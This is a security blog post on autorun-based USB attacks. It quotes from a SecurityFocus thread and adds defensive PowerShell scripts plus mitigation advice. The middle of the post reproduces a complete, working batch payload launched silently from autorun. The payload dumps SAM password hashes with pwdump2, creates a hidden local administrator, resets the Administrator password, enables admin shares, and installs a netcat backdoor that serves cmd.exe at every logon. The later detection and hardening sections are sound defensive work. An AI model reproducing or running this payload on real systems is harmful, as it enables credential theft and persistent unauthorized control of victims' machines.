For the past week there has been a nice discussion on SecurityFocus about USB attacks. Basically what the attacker does is insert a USB keyring drive into a computer. The drive is loaded with an autorun.inf that points to several batch files or scripts that can:
-Add new users
-Change admin rights
-Delete passwords
-Change passwords
-Use netcat to leave a backdoor
-Use pwdump to grab the password hashes out of the SAM
-Use basic Windows commands to grab system information
-Download trojans from a server
The possibilities are quite endless. One person (sorry, I forgot who it was) actually posted his scripts, which he claims work fine and have worked on more than one occasion:
Another person pointed out another cruel idea: leaving a CD on the ground with something like "Fourth Quarter Layoffs" written on it. I assure you more than one person would instantly insert it into their computer, and an autorun sequence could have their computer for lunch.
*********<BOF test.bat>
@echo off
:: Launcher referenced from autorun.inf: kick off b.bat minimized in the
:: background and exit so nothing stays visible on screen.
:: (start's own switches must come before the command it launches.)
@start /min /B b.bat
@exit
<EOF test.bat>
*********<BOF b.bat>
:: Open an Explorer window on the drive so the victim sees something normal
@explorer .
@echo off
::Displaying computer information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
::Dump the local password hashes (pwdump2 lives in Essential\DumpIt on the stick)
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators __system32__ /add
::Hide the account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system32__" /t REG_DWORD /d 0 /f
::Enabling admin shares (C$, ADMIN$)
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v AutoShareWks /t REG_DWORD /d 1 /f
::Changing admin password
@net user administrator .;[pl,mkoijnbhu
::Backdooring: drop netcat on the box and have it listen on port 80 at every logon
@copy nc.exe <nc directory>
@c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "<nc directory>\nc.exe -L -d -p 80 -e cmd.exe" /f
::Record what was done next to the hash dump on the stick
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>
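If you suspect a box has already been hit by something like b.bat, the script above tells you exactly what to look for: an extra local administrator, a zero-valued entry under SpecialAccounts\UserList, a Run key that launches netcat with "-e cmd.exe", and AutoShareWks forced on. The following PowerShell audit is an added example written for this page (it is not from the original post or the SecurityFocus thread); the registry paths and the netcat pattern come from the script, while the match regex and the output format are my own. It assumes you run it as Administrator on PowerShell 5.1 or later (Get-LocalGroupMember); on older systems substitute "net localgroup Administrators" for step 2.

```powershell
# Added example (not part of the original post): look for the artifacts
# the b.bat script leaves behind. Run as Administrator.
$findings = @()

# 1. Hidden accounts: any value set to 0 under SpecialAccounts\UserList hides
#    that account from the welcome screen, which is what the script does.
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    $props = Get-ItemProperty -Path $userList
    foreach ($p in $props.PSObject.Properties) {
        # Get-ItemProperty adds PSPath/PSParentPath/etc.; skip those
        if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) {
            $findings += "Hidden account entry: $($p.Name)"
        }
    }
}

# 2. Local Administrators membership: compare against what you expect.
$admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
          Select-Object -ExpandProperty Name
foreach ($a in $admins) { $findings += "Administrators member: $a" }

# 3. Run keys that start a netcat-style listener (the script uses "-e cmd.exe").
#    The regex is my own heuristic, not an exhaustive signature.
$runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run')
foreach ($k in $runKeys) {
    if (-not (Test-Path $k)) { continue }
    $props = Get-ItemProperty -Path $k
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }
        if ("$($p.Value)" -match 'nc(64)?\.exe|-e\s+cmd\.exe|-L\s+-d') {
            $findings += "Suspicious Run entry: $($p.Name) = $($p.Value)"
        }
    }
}

# 4. AutoShareWks explicitly set to 1 (the script forces admin shares on).
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters'
$asw = (Get-ItemProperty -Path $lanman -ErrorAction SilentlyContinue).AutoShareWks
if ($asw -eq 1) { $findings += 'AutoShareWks explicitly set to 1' }

if ($findings.Count -eq 0) { 'No indicators found' } else { $findings }
```

The Administrators listing is printed in full rather than filtered, because the account name in the script is trivially changed; what does not change is that a new local admin appears that nobody provisioned. Remember that the script also resets the built-in Administrator password, so a sudden lockout of that account is itself an indicator.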
Gadi Evron gives some ideas to stop these kinds of attacks (one in particular I really like). Basically, just a heads up that this can and does happen very easily, so watch out!

Gadi Evron writes:
"Disabling USB altogether, virtually, by domain policy or removing the USB devices themselves, maybe even just filling the plugs with silicon or glue physically are some more drastic options which some organizations *might* take, but I don't see it as a very viable option for most.
It all depends on your risk analysis. Cost vs. benefit, as always with security.
There exist several tools to monitor a domain for when and if a USB device is connected to any remote machine, and of what kind. A simple web search should help you find some examples."
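Two host-side settings cover the "disable USB by policy" option Gadi Evron mentions and, more cheaply, the autorun.inf trick itself. The script below is an added example for this page (not from the original post or from Gadi Evron's message): it reports the current state of both settings, applies the hardened values when run with -Harden, and then lists the USB storage devices the machine has already seen, which is the same registry history the monitoring tools mentioned above read. The registry values are documented Windows settings (NoDriveTypeAutoRun under Policies\Explorer, the USBSTOR service Start value, the Enum\USBSTOR device tree); the script name, switch and output format are my own. It assumes it is saved as a .ps1 and run as Administrator.

```powershell
# Added example (not part of the original post): audit and optionally harden
# the AutoRun and USB-storage settings, then show USB storage device history.
# Save as Audit-Autorun.ps1 and run as Administrator; add -Harden to apply.
param([switch]$Harden)

$explorerPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$usbstor     = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'

# NoDriveTypeAutoRun = 0xFF disables AutoRun for every drive type, so an
# autorun.inf on a stick or CD is never acted on.
$autorun = (Get-ItemProperty -Path $explorerPol -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
# USBSTOR Start = 4 means the mass-storage driver is disabled outright.
$start   = (Get-ItemProperty -Path $usbstor -ErrorAction SilentlyContinue).Start

'NoDriveTypeAutoRun : {0}' -f $(if ($null -eq $autorun) { 'not set (AutoRun allowed)' } else { '0x{0:X}' -f $autorun })
'USBSTOR Start      : {0}' -f $(if ($start -eq 4) { '4 (disabled)' } else { "$start (enabled)" })

if ($Harden) {
    if (-not (Test-Path $explorerPol)) { New-Item -Path $explorerPol -Force | Out-Null }
    Set-ItemProperty -Path $explorerPol -Name NoDriveTypeAutoRun -Type DWord -Value 0xFF
    Set-ItemProperty -Path $usbstor -Name Start -Type DWord -Value 4
    'Hardened: AutoRun disabled for all drive types, USBSTOR service disabled.'
}

# Every USB storage device ever enumerated leaves a subkey here:
# <vendor/product> \ <serial or instance id>, with a FriendlyName property.
$enum = 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR'
if (Test-Path $enum) {
    'USB storage devices previously seen on this machine:'
    Get-ChildItem -Path $enum | ForEach-Object {
        $device = $_.PSChildName
        Get-ChildItem -Path $_.PSPath | ForEach-Object {
            $inst = Get-ItemProperty -Path $_.PSPath
            '  {0}  serial={1}  name={2}' -f $device, $_.PSChildName, $inst.FriendlyName
        }
    }
}
```

Two caveats. Disabling the USBSTOR service only stops mass-storage devices; a USB device that presents itself as a keyboard is unaffected, so it is not a complete answer to "USB attacks", only to the autorun-from-a-stick variant described here. And on Windows XP and 2003 the NoDriveTypeAutoRun value was not honored consistently until Microsoft shipped a later update for it, so on an unpatched host of that vintage check behaviour rather than trusting the registry value alone.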
::links::
Part of the Message:
http://archives.neohapsis.com/archiv...4-05/0139.html
How to make an Auto Run CD:
http://msdn.microsoft.com/library/de...play_intro.asp
USB Storage FAQ:
http://www.microsoft.com/whdc/device...ge/usbfaq.mspx
Solutions:
DeviceLock - http://www.devicelock.com/
LANDesk System Manager 8 - http://www.landesk.com/
OptimAccess WorkSpy -
SecureNT - http://www.securewave.com/
http://www.sodatsw.cz/english/index.htm (description only in Czech)
http://www.annoyances.org/exec/forum/winxp/1079209374